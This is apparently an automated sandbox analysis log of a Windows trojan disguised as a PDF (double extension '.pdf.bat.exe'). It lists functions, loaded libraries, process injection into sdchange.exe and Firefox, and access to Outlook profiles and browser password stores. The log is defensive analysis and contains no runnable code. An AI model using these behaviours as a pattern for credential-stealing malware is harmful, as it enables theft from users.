Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D8739A
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32DFA352
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D2D34C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32DF132D
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32DEF0CC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32DF70E9
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32DFF0E0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32DF81CC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32E001AA
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D4B1B0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32E0B16B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D7516C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32DDA118
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D30100
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32DF16CC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D5C6E0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D3C7C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32DFF7B0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D64750
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D40770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32DEE4F6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF24464_2_32DF2446
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D314604_2_32D31460
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFF43F4_2_32DFF43F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DDD5B04_2_32DDD5B0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E005914_2_32E00591
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF75714_2_32DF7571
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D405354_2_32D40535
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEDAC64_2_32DEDAC6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3EA804_2_32D3EA80
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DDDAAC4_2_32DDDAAC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D85AA04_2_32D85AA0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFFA494_2_32DFFA49
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF7A464_2_32DF7A46
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB3A6C4_2_32DB3A6C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF6BD74_2_32DF6BD7
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D7DBF94_2_32D7DBF9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5FB804_2_32D5FB80
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFAB404_2_32DFAB40
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFFB764_2_32DFFB76
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6E8F04_2_32D6E8F0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D438E04_2_32D438E0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D268B84_2_32D268B8
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D428404_2_32D42840
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4A8404_2_32D4A840
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E0A9A64_2_32E0A9A6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D429A04_2_32D429A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D499504_2_32D49950
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5B9504_2_32D5B950
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D569624_2_32D56962
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFEEDB4_2_32DFEEDB
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D52E904_2_32D52E90
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFCE934_2_32DFCE93
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D49EB04_2_32D49EB0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40E594_2_32D40E59
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFEE264_2_32DFEE26
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D32FC84_2_32D32FC8
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4CFE04_2_32D4CFE0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41F924_2_32D41F92
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFFFB14_2_32DFFFB1
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB4F404_2_32DB4F40
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFFF094_2_32DFFF09
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D60F304_2_32D60F30
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D82F284_2_32D82F28
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D30CF24_2_32D30CF2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFFCF24_2_32DFFCF2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE0CB54_2_32DE0CB5
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40C004_2_32D40C00
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB9C324_2_32DB9C32
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5FDC04_2_32D5FDC0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3ADE04_2_32D3ADE0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D58DBF4_2_32D58DBF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF1D5A4_2_32DF1D5A
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D43D404_2_32D43D40
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF7D734_2_32DF7D73
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4AD004_2_32D4AD00
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: String function: 32DAEA12 appears 84 times
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: String function: 32D2B970 appears 266 times
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: String function: 32D87E54 appears 87 times
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: String function: 32D75130 appears 36 times
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: String function: 32DBF290 appears 105 times
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesdchange.exej% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032FD1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032C84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.0000000032AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesdchange.exej% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/10@3/3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 0_2_00402104 CoCreateInstance
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | File created: C:\Users\user\AppData\Local\Temp\nsn8FD7.tmp
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: sdchange.exe, 00000007.00000003.2810505866.0000000000905000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2806166818.0000000000905000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2936326745.0000000000905000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Virustotal: Detection: 15%
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | File read: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
            Source: unknown | Process created: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Process created: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe | Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
            Source: C:\Windows\SysWOW64\sdchange.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: powrprof.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: wkscli.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: umpdc.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | File written: C:\Windows\Resources\0809\mysterist.ini
            Source: C:\Windows\SysWOW64\sdchange.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: sdchange.pdbGCTL source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2936496818.0000000000728000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cXGDMXIloFhOE.exe, 00000006.00000002.2936926532.0000000000EEE000.00000002.00000001.01000000.0000000A.sdmp, cXGDMXIloFhOE.exe, 00000008.00000000.2687039028.0000000000EEE000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032B57000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.00000000329A4000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.0000000004710000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2611022611.000000000455B000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2608657007.00000000043AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032B57000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.00000000329A4000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.0000000004710000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2611022611.000000000455B000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2608657007.00000000043AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp
            Source: Binary string: sdchange.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2936496818.0000000000728000.00000004.00000020.00020000.00000000.sdmp
